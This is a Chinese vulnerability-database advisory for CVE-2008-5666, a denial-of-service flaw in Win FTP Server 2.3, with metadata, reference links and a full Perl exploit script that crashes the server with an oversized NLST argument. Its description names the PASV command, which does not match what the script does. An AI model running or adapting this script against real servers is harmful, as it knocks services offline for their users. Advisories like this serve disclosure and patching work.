Win FTP Server PASV命令远程拒绝服务漏洞

漏洞ID	1116240	漏洞类型	资源管理错误
发布时间	2008-09-26	更新时间	2008-12-19
CVE编号	CVE-2008-5666	CNNVD-ID	CNNVD-200812-379
漏洞平台	Windows	CVSS评分	3.5

|漏洞来源

https://www.exploit-db.com/exploits/6581
https://www.securityfocus.com/bid/31686
https://cxsecurity.com/issue/WLB-2008120174
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200812-379

|漏洞详情

WinFTPServer是一款专业的WindowsFTP服务器。如果远程攻击者向WinFTPServer发送了多个以PASV命令结尾的登录请求的话，就可能导致服务器崩溃。

|漏洞EXP

#!/usr/bin/perl
############
#
# Simple Dos Crap for the winftpsrv.exe v.2.3.0
#  by Julien Bedard
#
####################################

use Net::FTP;
$wftpsrvaddr = "255.255.255.255";
$overflow = "..?" x 35000;
$user = "test";
$pass = "test";
$port = 21;

$ftp = Net::FTP->new("$wftpsrvaddr", Debug => 0) || die "Cannot connect to ftp server: $@";
$ftp->login($user,$pass) || die "Cannot login ", $ftp->message;

$ftp->nlst($overflow);
$ftp->quit;

# milw0rm.com [2008-09-26]

|受影响的产品

Win FTP Server Win FTP Server 2.3

|参考资料

来源:XF
名称:winftpserver-nlst-dos(45806)
链接:http://xforce.iss.net/xforce/xfdb/45806
来源:SECTRACK
名称:1021040
链接:http://www.securitytracker.com/id?1021040
来源:MILW0RM
名称:6717
链接:http://www.milw0rm.com/exploits/6717
来源:VUPEN
名称:ADV-2008-2801
链接:http://www.frsirt.com/english/advisories/2008/2801
来源:SREASON
名称:4785
链接:http://securityreason.com/securityalert/4785
来源:SECUNIA
名称:32209
链接:http://secunia.com/advisories/32209